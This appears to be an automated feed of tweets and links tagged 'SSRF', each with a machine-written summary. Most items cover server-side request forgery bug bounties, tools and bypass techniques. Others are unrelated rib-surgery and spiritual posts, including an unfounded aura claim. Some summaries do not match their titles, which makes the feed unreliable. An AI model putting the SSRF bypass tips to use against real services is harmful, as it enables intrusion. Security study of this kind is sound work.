6202024-10-31 13:48:58 UTCs41r4j: #BugBounty vulnerabilities - for beginners: - #XSS - #SQL #injection - #CSRF - #SSRF - #IDOR - Information Disclosure - Directory Traversal - Open Redirect - Web Cache PoisoningThe content discusses various Bug Bounty vulnerabilities for beginners, including XSS, SQL injection, CSRF, SSRF, IDOR, Information Disclosure, Directory Traversal, Open Redirect, and Web Cache Poisoning. The information is shared by s41r4j on Twitter.
6212024-10-30 16:28:52 UTC@CWISociety: It's always a good day to hear about #CWIS #SSRF guidelines from Past Prez @zmbauman. Thanks to #CAMIT for the opportunity! #cwismemberThe content highlights a tweet from @CWISociety expressing appreciation for learning about #CWIS #SSRF guidelines from Past President @zmbauman, thanking #CAMIT for the opportunity. The tweet emphasizes the importance of staying informed and connected within the CWIS community.
6222024-10-30 15:19:12 UTCCWISociety: Cheers for @realJSkubic as he knocks it out of the park on Thoracic Imaging at #CAMIT2024 today! #CWISmember #ssrf #chestwallinjuryeducation@realJSkubic received praise for his presentation on Thoracic Imaging at #CAMIT2024 by CWISociety. The event highlighted chest wall injury education and showcased his expertise. He is recognized as a valuable member of CWIS and the SSRF community. The tweet celebrates his success and contributions in the field.
6232024-10-28 23:13:16 UTC@howdocomputer: Unauth #SSRF & #XSS onThe content mentions the discovery of unauthorized Server-Side Request Forgery (SSRF) and Cross-Site Scripting (XSS) vulnerabilities. These vulnerabilities can potentially allow attackers to manipulate server requests and inject malicious scripts into a website. It is crucial for website owners to address and patch these vulnerabilities to prevent exploitation by malicious actors.
6242024-10-28 08:43:53 UTC@KonwarAbhi98099: Blind SSRF on a Hackerone Program Credit: #$ubh@nk@r #ssrfThe content mentions a Twitter post by user @KonwarAbhi98099 about discovering a Blind Server-Side Request Forgery (SSRF) vulnerability in a Hackerone program. The post credits the discovery to user #$ubh@nk@r. The specific details or implications of the vulnerability are not provided in the summary.
6252024-10-27 16:04:28 UTCnmkannans: Common SSRF misconceptions during the interviews - OWASP top 10 #SSRF #bugbountytip #bugbountytips #CyberSecurityThe content discusses common misconceptions about Server-Side Request Forgery (SSRF) during interviews, referencing OWASP top 10. It touches on SSRF-related topics such as bug bounty tips and cybersecurity. The Twitter post by user nmkannans highlights the importance of understanding and addressing SSRF vulnerabilities in the context of cybersecurity.
6262024-10-26 17:31:45 UTC(PDF) Surgical stabilization of rib fractures (SSRF): the WSES and CWIS position paperThe content is a position paper on Surgical Stabilization of Rib Fractures (SSRF) by the World Society of Emergency Surgery (WSES) and the Chest Wall Injury Society (CWIS). The paper likely discusses the indications, techniques, and outcomes of SSRF, emphasizing the importance of this surgical intervention in managing rib fractures. It may also provide guidelines and recommendations for healthcare professionals involved in the care of patients with rib fractures.
6272024-10-23 05:13:51 UTCDanaEpp: Check out this article to learn how to find and exploit server-side request forgery (SSRF) vulnerabilities in an API. #apihacking #ssrfThe content shared by DanaEpp focuses on learning how to identify and exploit server-side request forgery (SSRF) vulnerabilities in an API. The tweet encourages checking out an article for insights into API hacking and SSRF. DanaEpp provides a link to the article for further information on this topic. The post is tagged with #apihacking and #ssrf to highlight the relevance of the content.
6282024-10-22 08:28:30 UTC@davidwillisowen: Huntr is a bug bounty platform designed specifically for AI/ML libraries The top 3 bugs that keep cropping up are LFI RCE and SSRF #hacking #bugbounty #ssrfHuntr is a bug bounty platform for AI/ML libraries. The top recurring bugs are LFI, RCE, and SSRF. This information was shared on Twitter by @davidwillisowen. #hacking #bugbounty #ssrf
6292024-10-22 00:48:44 UTCiototsecnews: Vulnerability CVE-2024-47830 in the Plane project management tool fixed: SSRF with a CVSS score of 9.3 #OpenSource #Plane #ProjectManagement #SSRF #VulnerabilityThe content discusses a vulnerability (CVE-2024-47830) in the Plane project management tool, an SSRF with a CVSS score of 9.3, which has been fixed. The post highlights the vulnerability in the open-source project management tool and includes relevant hashtags like #OpenSource, #Plane, #ProjectManagement, #SSRF, and #Vulnerability.
6302024-10-21 15:04:37 UTC@grumpzsux: Advanced SSRF via HTTP/2 Frames: Exploit HTTP/2 frame multiplexing to send SSRF payloads to internal services that are otherwise protected. Target servers misconfigured with H2C (HTTP/2 Cleartext) support. #SSRF #HTTP2Exploits #BugBountyThe content discusses exploiting HTTP/2 frame multiplexing for advanced SSRF attacks, targeting servers misconfigured with H2C support. This method allows sending SSRF payloads to internal services that are usually protected. The post highlights the potential vulnerability and encourages awareness of SSRF, HTTP/2 exploits, and bug bounty programs. The information is shared on Twitter by the user @grumpzsux.
6312024-10-21 10:43:48 UTCgrumpzsux: Abusing WebSockets for SSRF: Use WebSocket connections to exploit poorly validated Origin headers. Use this to bypass SSRF protections or access internal services behind firewalls. #WebSocketExploitation #SSRF #BugBountyThe content discusses exploiting WebSockets for SSRF by manipulating poorly validated Origin headers. This can be used to bypass SSRF protections and access internal services behind firewalls. The post highlights the potential security risks and encourages bug bounty hunters to explore WebSocket exploitation for vulnerabilities. The Twitter link provides more details on this topic. #WebSocketExploitation #SSRF #BugBounty.
6322024-10-21 04:13:36 UTCJagoJainJagore: 200 Avdhan - Mahashatvadhan by a Jain Monkसगर क मत #jainism #ssrf #jain #saraswati #ratlam #jainreel #jaijinendraThe content discusses "JagoJainJagore: 200 Avdhan - Mahashatvadhan" by a Jain Monk, focusing on spiritual awakening and enlightenment. It includes hashtags related to Jainism, SSRF, Saraswati, Ratlam, Jainreel, and Jaijinendra. The Twitter post shares insights and teachings related to Jain philosophy and spirituality.
6332024-10-17 16:22:54 UTCExfiltrated, Signed, Delivered – What Can Go Wrong When an Amazon Elastic Compute Cloud (EC2) Instance is Exposed to SSRFThe content discusses the risks of exposing an Amazon Elastic Compute Cloud (EC2) instance to Server-Side Request Forgery (SSRF). By using CNAPPgoat, users can explore how SSRF can be exploited to make unauthorized calls to AWS services from within an EC2 instance. This highlights the potential security vulnerabilities that can arise when SSRF is not properly mitigated, emphasizing the importance of securing EC2 instances to prevent such attacks.
6342024-10-17 16:18:22 UTCCybersecurity, IT Courses & Training Catalog - CybraryCybrary offers a catalog of cybersecurity and IT courses and training, focusing on certification preparation. The platform aims to educate individuals, businesses, and organizations in the field of cybersecurity and IT.
6352024-10-17 16:17:03 UTCCarrying Out Your First SSRF Attack - Introduction to Server-Side Request Forgery Lesson | QA PlatformThe content introduces a lesson on Server-Side Request Forgery (SSRF) attacks on the QA Platform. It encourages individuals to begin learning about SSRF attacks through their digital training solutions.
6362024-10-17 16:16:52 UTChacktricks/pentesting-web/ssrf-server-side-request-forgery/README.md at master · HackTricks-wiki/hacktricksThe content is a repository called "HackTricks" that contains various tricks, techniques, and knowledge related to cybersecurity, learned from Capture The Flag competitions, real-world applications, research, and news. It serves as a resource for individuals interested in learning about topics like server-side request forgery (SSRF) in web pentesting. The repository aims to provide a comprehensive collection of information to help individuals enhance their understanding of cybersecurity concepts and improve their skills in this field.
637 | 2024-10-17 16:16:42 UTC | Server-Side Request Forgery (SSRF) | The content highlights a global security provider trusted by major organizations, utilizing ethical hackers for agile security testing. The emphasis is on a community of ethical hackers who approach security challenges from an attacker's perspective. The provider offers crowdsourced security services to enhance security measures for organizations.
638 | 2024-10-17 16:15:33 UTC | Server-Side Request Forgery (SSRF) involves an attacker tricking a server into making unauthorized… | The blog post discusses Server-Side Request Forgery (SSRF), where attackers deceive servers into making unauthorized requests. It covers the definition of SSRF, its impact, how it operates, and basic prevention measures.
639 | 2024-10-17 16:14:39 UTC | Let’s Understand SSRF vulnerability | The content provides an introduction to understanding SSRF (Server-Side Request Forgery) vulnerability. SSRF is a type of security vulnerability that allows an attacker to manipulate the server into making unauthorized requests on their behalf. This can lead to data breaches, unauthorized access, and other security risks. Understanding SSRF is crucial for developers and security professionals to prevent and mitigate such vulnerabilities in web applications.
640 | 2024-10-17 16:14:28 UTC | 👩‍💻 Roadmap to Cybersecurity in 2022, Full-Read SSRF, IDOR in GraphQL, GCP Pentesting, and much… | The content discusses a talk focusing on cybersecurity in 2022, covering topics such as SSRF, IDOR in GraphQL, GCP Pentesting, and more. The talk highlights the significant value, over $25 billion, that is at risk due to practical attacks on bridges. It emphasizes the importance of understanding and addressing vulnerabilities in cybersecurity to protect valuable assets.
641 | 2024-10-17 16:14:20 UTC | 👩‍💻 $600k Bounty, Jetty Features, Response Queue Poisoning, Bypass SSRF Protections, XSS… | A $600K bounty was awarded due to a business logic flaw in smart contracts.
642 | 2024-10-17 16:12:35 UTC | Exploiting: SSRF For Admin Access | The content is about exploiting Server-Side Request Forgery (SSRF) vulnerabilities to gain admin access. SSRF allows attackers to make requests on behalf of the server, potentially accessing internal systems or performing unauthorized actions. By manipulating URLs, attackers can trick the server into fetching sensitive data or executing commands. This can lead to unauthorized access to admin interfaces, compromising the system's security. The article likely discusses the risks of SSRF vulnerabilities, the impact on system security, and potential mitigation strategies to prevent such attacks.
643 | 2024-10-17 16:12:23 UTC | Server-Side Request Forgery — SSRF: Exploitation Technique | Server-side request forgery (SSRF) is a vulnerability where an attacker can manipulate a server to make unauthorized HTTP requests. This exploitation technique can lead to sensitive data exposure, unauthorized access, and potential server compromise. Preventing SSRF involves input validation, using whitelists, and restricting server access to prevent attackers from exploiting this vulnerability.
644 | 2024-10-17 16:11:30 UTC | Story of a 2.5k Bounty — SSRF on Zimbra Led to Dump All Credentials in Clear Text | The content discusses a successful bug bounty story where the author and a friend earned approximately $2500 from Cafebazaar by exploiting a Server-Side Request Forgery (SSRF) vulnerability on Zimbra, leading to the exposure of all credentials in clear text.
645 | 2024-10-17 16:11:20 UTC | My First Bug: Blind SSRF Through Profile Picture Upload | The content is a writeup detailing the discovery of the author's first bug, which involves a blind Server-Side Request Forgery (SSRF) vulnerability through profile picture upload. The author likely shares their experience, the steps taken to identify the bug, and the impact of the vulnerability. This bug could potentially allow an attacker to manipulate the server into making requests on their behalf, leading to unauthorized access or data leakage. The writeup may also include insights on responsible disclosure and the importance of thorough security testing in web applications.
646 | 2024-10-17 16:11:10 UTC | Story Behind Sweet SSRF. | The content emphasizes the importance of persistence in achieving success. It suggests that perseverance is crucial for reaching goals and overcoming challenges. The phrase "Persistence is the Key to Success" highlights the idea that consistent effort and determination are essential for accomplishing one's objectives.
647 | 2024-10-17 16:10:34 UTC | Finding SSRF BY Full Automation | The content provided is too brief to summarize as it only contains a greeting.
648 | 2024-10-17 16:07:23 UTC | 10 Types of Web Vulnerabilities that are Often Missed - Labs Detectify | The content discusses 10 commonly overlooked web vulnerabilities identified by hackers Hakluke and Farah Hawa. These vulnerabilities are often missed during security testing, particularly in bug bounty programs. By highlighting these overlooked issues, the article aims to improve web security measures and encourage thorough bug hunting practices.
649 | 2024-10-17 16:06:49 UTC | How I found 3 SSRF in one day on different bug bounty targets. | The blog discusses the author's approach to bug bounty targets, detailing how they discovered three Server-Side Request Forgery (SSRF) vulnerabilities within 5-6 hours on different targets. The focus is on their successful identification of SSRF vulnerabilities and the speed at which they were able to find them.
650 | 2024-10-17 16:06:41 UTC | Server Side Request Forgery — SSRF | Server Side Request Forgery (SSRF) is a web vulnerability that enables attackers to manipulate a server to make unauthorized requests. This issue can lead to data leaks, unauthorized access, and potential server exploitation. Preventing SSRF involves input validation, restricting access to sensitive resources, and using secure coding practices. It is crucial for developers and organizations to be aware of SSRF risks and implement robust security measures to mitigate this threat effectively.
651 | 2024-10-17 16:06:07 UTC | Vimeo SSRF with code execution potential. | The content discusses the discovery of a semi-responded SSRF vulnerability on Vimeo that potentially allows for code execution. The author shares their process of finding and exploiting this vulnerability in a blog post.
652 | 2024-10-17 16:05:55 UTC | BugBounty | A Simple SSRF | The content discusses a bug bounty program where the author encountered a Simple Server-Side Request Forgery (SSRF) vulnerability. Due to the private nature of the program, specific details cannot be disclosed. The focus is on the SSRF vulnerability, a common security issue that allows attackers to manipulate server requests. The author likely discovered and reported the vulnerability as part of the bug bounty program, emphasizing the importance of identifying and addressing such security flaws to protect systems from potential exploitation.
653 | 2024-10-17 16:05:46 UTC | B-XSSRF - Toolkit To Detect And Keep Track On Blind XSS, XXE And SSRF | "B-XSSRF is a toolkit designed to detect and monitor Blind XSS, XXE, and SSRF vulnerabilities. The setup involves uploading files to a server and creating a database. The toolkit helps in identifying and tracking these security issues to enhance the overall security posture of a system."
654 | 2024-10-17 16:05:14 UTC | SSRF Vulnerability due to Sentry misconfiguration | The content is vague and lacks specific details or information. It mentions a story related to a disclosed report but does not provide any context or details about the SSRF vulnerability due to Sentry misconfiguration.
655 | 2024-10-17 16:05:02 UTC | SVG XLink SSRF fingerprinting libraries version | SSRF (Server-side request forgery) is a common attack surface, especially in uploading functionalities where applications fetch data. This vulnerability can be exploited by attackers to access internal systems or perform malicious actions. It is important to be aware of SSRF risks and implement proper security measures to prevent such attacks.
656 | 2024-10-17 16:04:51 UTC | AWS takeover through SSRF in JavaScript | The content discusses a bug found in a private bug bounty program on Hackerone, where the author exploited a Server-Side Request Forgery (SSRF) vulnerability in JavaScript to obtain AWS credentials. This allowed them to compromise the company's AWS account, gaining control over 20 buckets and 80 EC2 instances. The author highlights the learning experience gained from this successful exploit and expresses a desire to share their knowledge.
657 | 2024-10-17 11:43:24 UTC | breacharcom: Server-Side Request Forgery (SSRF) allows attackers to make unauthorized requests from the server potentially accessing internal systems. Protect your apps by validating and sanitizing user input. #SSRF #CyberSecurity #OSCP #OSWE #infosec #offsec #Pentesting #redteam | The content warns about Server-Side Request Forgery (SSRF) enabling unauthorized requests from servers, risking access to internal systems. It advises safeguarding apps by validating and sanitizing user input. The post emphasizes cybersecurity measures and mentions relevant hashtags like #OSCP, #OSWE, #infosec, #offsec, #Pentesting, and #redteam.
658 | 2024-10-17 01:45:59 UTC | Server Side Request Forgery (SSRF) Testing | The content discusses Server Side Request Forgery (SSRF) testing for fun rather than for a bounty. The author discovered a website vulnerable to SSRF but did not exploit it. The focus is on testing and identifying SSRF vulnerabilities in web applications.
659 | 2024-10-17 01:45:22 UTC | How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE! | The content discusses the author's discovery and exploitation of four vulnerabilities on GitHub Enterprise, leading from SSRF execution to Remote Code Execution (RCE). The author mentions preparing for talks at Black Hat USA 2017 and DEF CON 25. The focus is on the technical details of the vulnerabilities found and the chain of events that led to RCE.
660 | 2024-10-17 01:44:59 UTC | SSRF bible. Cheatsheet | The content is a cheatsheet on Server-Side Request Forgery (SSRF) with revision 1.03 from January 26, 2017. It includes information on basics, typical attack steps, and file descriptions related to SSRF. The authors are from the Wallarm research team, and the cheatsheet is available on their website. Additionally, a new product called Wallarm FAST for security tests from traffic is promoted.
661 | 2024-10-15 17:13:53 UTC | Find SSRF, LFI, XSS using httpx, waybackurls, gf, gau, qsreplace | The content discusses utilizing tools like httpx, waybackurls, gf, gau, and qsreplace to find SSRF, LFI, and XSS vulnerabilities. These advanced bug bounty tips can aid in bug hunting. The author recommends visiting a website for more information, including videos on advanced subdomain reconnaissance, subdomain takeover, and proof of concept demonstrations. The content encourages readers to begin utilizing these tools for bug bounty hunting.
662 | 2024-10-15 17:13:52 UTC | Digging for SSRF in NextJS apps | The content discusses the shift from heavyweight CMS like Wordpress to modern static landing pages for new businesses. It highlights the familiarity hackers have with attacking CMS solutions like Wordpress due to their well-understood attack surfaces. The focus is on the security implications, particularly Server-Side Request Forgery (SSRF), when developing landing pages using NextJS apps.
663 | 2024-10-15 17:13:52 UTC | Owning the clout through SSRF and PDF generators - Public v1.0 | The content discusses how attackers can exploit Server-Side Request Forgery (SSRF) to manipulate server functionality and access internal resources. SSRF attacks enable unauthorized reading or modification of server data.
664 | 2024-10-15 17:13:52 UTC | Oh snap! We don't support this version of your browser, and neither should you! | The content informs visitors of an unsupported browser, lacking necessary security features. It advises updating the browser for optimal performance and security. Visitors encountering this message in error are encouraged to contact the site, specifying their browser version for assistance.
665 | 2024-10-15 17:13:51 UTC | Hunting for SSRF Bugs in PDF Generators | The content discusses how features like printing certificates, generating reports, and submitting digital signatures on websites can indicate vulnerabilities to server-side request forgery (SSRF) bugs. These features are potential hot spots for SSRF issues. The article suggests that these functionalities can be exploited by attackers.
666 | 2024-10-15 17:13:47 UTC | blackhatethicalhacking/SSRFPwned | "SSRFPwned" is a resource created by Chris "SaintDruG" Abou-Chabké from Black Hat Ethical Hacking for Offensive Security attacks.
667 | 2024-10-15 17:13:47 UTC | assetnote/surf | "surf" is a tool that filters a list of hosts to identify potential SSRF (Server-Side Request Forgery) candidates. It works by sending HTTP requests to hosts from your machine, collecting unresponsive hosts, and categorizing them as externally or internally facing. This process helps in identifying hosts vulnerable to SSRF attacks efficiently.
668 | 2024-10-15 17:13:45 UTC | reddelexc/hackerone-reports | The content discusses HackerOne reports stored in data.csv, with update scripts in Python 3 needing chromedriver and Chromium executables in PATH. Each script includes operational details. The scripts should be run in the order of Tops 100 to update the reports effectively.
669 | 2024-10-15 17:13:45 UTC | Th0h0/autossrf | The content highlights the tool "autoSSRF" as a valuable resource for detecting SSRF vulnerabilities efficiently and effectively. It emphasizes the tool's ability to identify SSRF vulnerabilities on a large scale, indicating its usefulness in enhancing security measures.
670 | 2024-10-15 17:13:44 UTC | assetnote/blind-ssrf-chains | Server Side Request Forgery (SSRF) enables servers to make requests on behalf of users, potentially accessing internal resources. This vulnerability occurs when a server is coerced into making arbitrary requests. Exploiting SSRF allows attackers to leverage the server's network position for unauthorized access.
671 | 2024-10-15 17:13:43 UTC | imran-parray/Mind-Maps | The repository contains Mindmaps for bug bounty hunters, pentesters, and security professionals, contributed by the owner and the community. It serves as a resource for offensive and defensive security strategies.
672 | 2024-10-15 17:13:43 UTC | incredibleindishell/SSRF_Vulnerable_Lab | The repository "incredibleindishell/SSRF_Vulnerable_Lab" contains PHP code vulnerable to Server-Side Request Forgery (SSRF) attacks. It demonstrates how certain functions in programming languages can retrieve content from both local files and remote URLs, making them susceptible to exploitation.
673 | 2024-10-15 17:13:42 UTC | swisskyrepo/SSRFmap | SSRFmap is a framework designed to identify and exploit SSRF vulnerabilities that can be used to manipulate actions on other services. It simplifies the process of finding and exploiting these vulnerabilities by taking a Burp request file and a parameter to fuzz as input. By leveraging SSRF, attackers can potentially access and manipulate sensitive information or perform unauthorized actions on various services.
674 | 2024-10-14 13:13:57 UTC | mutantera0: Types of vpn #Cybersecurity #InfosecTools #EthicalHacking #PenTesting #CTF #Vulnerability #Hunting #SSRF #bugbountytips #bugbountytools #Securityresearch #bugbounty #vpn #virtualprivatenetwork | The content discusses different types of VPNs in the context of cybersecurity, ethical hacking, penetration testing, and bug bounty programs. It highlights the importance of VPNs in securing online activities and protecting sensitive information. The post also includes relevant hashtags related to cybersecurity and information security tools. The focus is on understanding the various types of VPNs and their role in enhancing online security.
675 | 2024-10-13 17:18:54 UTC | spencer_5cent: @Hacker0x01 @prescientsec 2/2 5. If different IP/port combos show different response bodies, you have SSRF. 6. If you see CONSISTENT differences in response times for certain ports/IPs, you have Blind SSRF. #ssrf @SynackRedTeam | The content discusses SSRF (Server-Side Request Forgery) detection methods shared by spencer_5cent on Twitter. It mentions that if different IP/port combinations yield different response bodies, it indicates SSRF. Additionally, consistent variations in response times for specific ports/IPs suggest Blind SSRF. The tweet includes the hashtag #ssrf and mentions @SynackRedTeam.
676 | 2024-10-13 14:04:36 UTC | InfoStratosally: Beware of SSRF: A silent threat where attackers manipulate servers to access sensitive data or internal systems. Strengthen your defenses by validating inputs and restricting access! #Cybersecurity #SSRF #DataProtection | The content warns about SSRF (Server-Side Request Forgery), a threat where attackers manipulate servers to access sensitive data or internal systems. It emphasizes the importance of strengthening defenses by validating inputs and restricting access to mitigate this risk. The post underscores the significance of cybersecurity measures and data protection in safeguarding against SSRF attacks.
677 | 2024-10-11 19:18:35 UTC | PHP SSRF Techniques | The content discusses PHP Server-Side Request Forgery (SSRF) techniques focusing on bypassing security measures like filter_var(), preg_match(), and parse_url(). It likely covers methods to manipulate input data to exploit vulnerabilities in these functions, potentially allowing attackers to make unauthorized requests from the server. The content may provide insights into how attackers can circumvent these common PHP functions to carry out SSRF attacks.
678 | 2024-10-11 16:56:18 UTC | GitLab Patches Pipeline Execution SSRF XSS Vulnerabilities | GitLab recently addressed security vulnerabilities related to Pipeline Execution, Server-Side Request Forgery (SSRF), and Cross-Site Scripting (XSS) through patches. These vulnerabilities could potentially be exploited by attackers to compromise the security of GitLab instances. The patches aim to prevent these vulnerabilities from being exploited, enhancing the overall security of the platform.
679 | 2024-10-11 12:43:37 UTC | @mutantera0: How To Integrate GPT Into Command Line #Cybersecurity #InfosecTools #EthicalHacking #PenTesting #CTF #VulnerabilityHunting #SSRF #bugbountytips #bugbountytools #SecurityResearch #bugbounty | The content shared by @mutantera0 on Twitter discusses integrating GPT (Generative Pre-trained Transformer) into the command line for various cybersecurity purposes like ethical hacking, penetration testing, CTF, vulnerability hunting, SSRF, bug bounty tips, and security research. The tweet provides insights into leveraging GPT technology within the command line for cybersecurity tasks.
680 | 2024-10-10 07:23:12 UTC | mutantera0: 20 Very Advanced Information Gathering Tools #Cybersecurity #InfosecTools #EthicalHacking #PenTesting #CTF #VulnerabilityHunting #SSRF #bugbountytips #bugbountytools #SecurityResearch #bugbounty | The content highlights a list of 20 advanced information gathering tools relevant to cybersecurity, ethical hacking, penetration testing, Capture The Flag (CTF) challenges, vulnerability hunting, Server-Side Request Forgery (SSRF), bug bounty tips, bug bounty tools, and security research. The tools are shared by the Twitter user mutantera0. The post includes hashtags related to cybersecurity topics.
681 | 2024-10-08 16:38:32 UTC | @S_Sasili: Simple script to chain SSRF issues with arbitrary HTTP redirect (with auth header) to trigger leaking sensitive headers. #Cybersecurity #InfosecTools #EthicalHacking #PenTesting #CTF #VulnerabilityHunting #SSRF #bugbountytips #bugbountytools #SecurityResearch #bugbounty | The content discusses a simple script created by @S_Sasili that chains SSRF vulnerabilities with arbitrary HTTP redirects, using an authentication header to expose sensitive headers. The script aims to aid in cybersecurity, ethical hacking, penetration testing, CTF challenges, vulnerability hunting, and bug bounty programs. It highlights the importance of security research and provides tools for bug bounty hunters. The script's purpose is to demonstrate a technique for exploiting SSRF vulnerabilities to leak sensitive information. The link provided directs to the original tweet by @S_Sasili.
682 | 2024-10-08 13:28:54 UTC | redfoxsec: Understanding Server-Side Request Forgery (SSRF)! Explore this critical vulnerability that allows attackers to manipulate web apps into unauthorized requests. Learn how SSRF can: access internal resources, bypass security measures. #SSRF #CyberSecurity | The content discusses Server-Side Request Forgery (SSRF), a critical vulnerability that enables attackers to manipulate web apps for unauthorized requests. SSRF allows access to internal resources and bypasses security measures. This vulnerability poses a significant threat to cybersecurity. #SSRF #CyberSecurity.
683 | 2024-10-08 06:28:44 UTC | mutantera0: Simple script to chain SSRF issues with arbitrary HTTP redirect (with auth header) to trigger leaking sensitive headers. Github: #Cybersecurity #InfosecTools #EthicalHacking #PenTesting #CTF #VulnerabilityHunting #SSRF #bugbountytips #bugbountytools | The content discusses a script shared by mutantera0 that chains SSRF issues with an arbitrary HTTP redirect using an auth header to expose sensitive headers. The script is available on GitHub and is relevant to cybersecurity, ethical hacking, penetration testing, CTF challenges, vulnerability hunting, and bug bounty programs. The focus is on exploiting SSRF vulnerabilities to leak sensitive information. The Twitter link provides more details.
684 | 2024-10-01 22:58:37 UTC | Eth1calHackrZ: 11/14 Educate #Yourself: Understanding how #attacks like #SSRF and #XSS work can better prepare you for defending against them. #KnowledgeIsPower #CyberEducation | The content emphasizes the importance of educating oneself on attacks like SSRF and XSS to enhance defense strategies. It highlights the significance of knowledge in cybersecurity and encourages individuals to learn about these attack methods for better preparedness. The tweet suggests that understanding how these attacks work can empower individuals to defend against them effectively. Eth1calHackrZ promotes the idea that education is key in the realm of cybersecurity.
685 | 2024-10-01 20:43:57 UTC | @Eth1calHackrZ: 5/14 Universal #Exploit: #Manipulating the "x-forwarded-proto" header led to #fullresponse #SSRF and #XSS across all "@netlify/ipx" setups. Learn how! #CyberAttack #Web3Vulnerabilities | The content discusses a universal exploit discovered by @Eth1calHackrZ on 5/14 involving manipulating the "x-forwarded-proto" header, leading to full response SSRF and XSS vulnerabilities across all "@netlify/ipx" setups. The post highlights the potential cyber attack risks and web vulnerabilities associated with this exploit. It encourages learning more about the exploit and its implications.
686 | 2024-10-01 20:43:55 UTC | @Eth1calHackrZ: 4/14 Image Optimization Gone Wrong: Delve into how "@netlify/ipx" allowed #SSRF & #XSS attacks due to improper #URL parsing. #ServerSideRequestForgery #CrossSiteScripting #NetlifySecurity | The content discusses a security issue with "@netlify/ipx" that led to SSRF and XSS attacks due to improper URL parsing. The tweet highlights the vulnerability and mentions the hashtags #ServerSideRequestForgery, #CrossSiteScripting, and #NetlifySecurity. The post warns about the risks associated with image optimization gone wrong.
687 | 2024-09-29 21:04:32 UTC | SandroBruscino: This article explains how DNS rebinding can bypass SSRF filters. Even 1 in 30 successful requests can be a game changer! #CyberSecurity #SSRF #DNSRebinding | The article by SandroBruscino discusses how DNS rebinding can circumvent SSRF filters, highlighting the significance of even a small success rate. This has implications for cybersecurity, emphasizing the potential impact of this technique. The tweet provides a link to the article for further information.
688 | 2024-09-29 20:03:53 UTC | @nmkannans: As a part of my python learning created this python exploit script to run #SSRF port scans in a vulnerable Web / API endpoint that allows parameters in the request body -- #CyberSec #BugBounty #Pentesting #CyberSec #Security | The content discusses the creation of a Python exploit script by @nmkannans for running SSRF port scans on a vulnerable Web/API endpoint that accepts parameters in the request body. The script is part of the author's Python learning journey and is shared in the context of cybersecurity, bug bounty programs, pentesting, and general security awareness. The script's purpose is to identify security vulnerabilities in web applications.
689 | 2024-09-28 13:58:32 UTC | SSRFspiritual: Curious about spirituality? Join the SSRF Online Spiritual Meeting! Feel inner peace, gain clarity on your spiritual journey and connect with like-minded seekers. When: Sun 29 Sep 2024 at 15:00 UTC Register now: #SSRF #Spirituality | Join the SSRF Online Spiritual Meeting on Sun, 29 Sep 2024, at 15:00 UTC to explore spirituality, find inner peace, gain clarity on your spiritual journey, and connect with like-minded seekers. Register now to participate in this event focused on spiritual growth and understanding. #SSRF #Spirituality.
690 | 2024-09-27 20:58:16 UTC | NYULHLI_Trauma: Trauma & Acute Care Surgeon Dr. Daphnee Beaulieu presents on Surgical Stabilization of Rib Fractures for the Geriatric Patient @ACOSurgeons #ACA2024! Our team is proudly on the forefront of management of chest wall injuries! @CWISociety #SSRF #ORIF #ChestWallInjuryCenter | Dr. Daphnee Beaulieu, a Trauma & Acute Care Surgeon, presented on "Surgical Stabilization of Rib Fractures for the Geriatric Patient" at #ACA2024. The focus was on managing chest wall injuries, highlighting the team's expertise in this area. The presentation likely covered techniques like SSRF and ORIF for chest wall injuries. The event was organized by @ACOSurgeons and @CWISociety, showcasing the team's commitment to staying at the forefront of trauma care.
691 | 2024-09-27 08:13:30 UTC | @spiritualsai: @kajal_ok_ @MonaPatelT Spiritually pure dance forms like Kathak can uplift the dancer, audience & environment. Mrs. Sonia Parchure's aura doubled, reaching 20m after performing at the Maharshi University of Spirituality. Watch here: #Kathak #Spirituality #SSRF | The post highlights how spiritually pure dance forms like Kathak can uplift dancers, audiences, and environments. It mentions Mrs. Sonia Parchure's aura doubling to 20m after performing at the Maharshi University of Spirituality. The content encourages watching the performance for insights into the connection between Kathak, spirituality, and personal energy.
692 | 2024-09-26 19:08:34 UTC | @MrD3fu1t: @Medium @bountywriteups @Hacker0x01 @Bugcrowd @github A moment ago I went to read a writeup about #xss #lfi #ssrf from @Medium. When I submitted that writeup link to Freedium to bypass the paywall, it showed me an XSS vulnerability. | The content mentions a Twitter post by @MrD3fu1t where they visited Medium to read about XSS, LFI, and SSRF. They submitted the writeup link to Freedium to bypass a paywall, revealing an XSS vulnerability. The post includes tags for various platforms like HackerOne, Bugcrowd, and GitHub.
693 | 2024-09-26 15:09:39 UTC | reverseame: SSRFing the Web with the Help of Copilot Studio #SSRF #Microsoft #CopilotStudio #Vulnerability #Critical | The content discusses SSRF (Server-Side Request Forgery) vulnerabilities in web applications, specifically using Copilot Studio from Microsoft to exploit them. The focus is on the critical nature of these vulnerabilities and their potential impact. The tweet highlights the importance of understanding and addressing SSRF vulnerabilities in web security.
694 | 2024-09-25 19:04:16 UTC | cyber24x7: 10. #ThreatPatrol a #Python script based tool that can scan websites for #vulnerabilities including #SQLinjection #XSS #CSRF #SSRF #LFI and #RCE. | The content discusses cyber24x7's #ThreatPatrol, a Python script tool that scans websites for vulnerabilities like SQL injection, XSS, CSRF, SSRF, LFI, and RCE. The tool aims to enhance website security by identifying and addressing these potential threats. The tool's capabilities are highlighted in a tweet from cyber24x7.
695 | 2024-09-25 13:18:48 UTC | prod42net: Unlocking SSRF potential with Peppa's insights on finding ports beyond 9001. Scan 1-65535 for valid ports, watch for img tag in responses. #CyberSecurity #SSRF #PortScanning | The content discusses utilizing SSRF to find ports beyond 9001 by scanning 1-65535 for valid ports and monitoring responses for img tags. Peppa's insights are highlighted for unlocking SSRF potential. The post emphasizes cybersecurity, SSRF, and port scanning. The link provided leads to the original tweet on Twitter.
696 | 2024-09-25 12:28:21 UTC | @prod42net: Peppa's latest on CBJS: SSRF 2 reveals how to access admin.php, decode base64 content & display in image tag for easy reading. Don't miss this encryption tip! #CyberSecurity #SSRF #Encryption | Peppa's latest post on SSRF 2 discusses accessing admin.php, decoding base64 content, and displaying it in an image tag for easier reading. The content emphasizes an encryption tip related to cybersecurity and SSRF. The post is shared on Twitter by @prod42net.
697 | 2024-09-25 02:31:52 UTC | Ivanti's bug-plagued network appliances attacked using fresh exploit | Ivanti's network appliances are facing attacks due to a new exploit. The appliances have been plagued by bugs, making them vulnerable to security breaches. The fresh exploit is being used to target these appliances, posing a threat to their security.
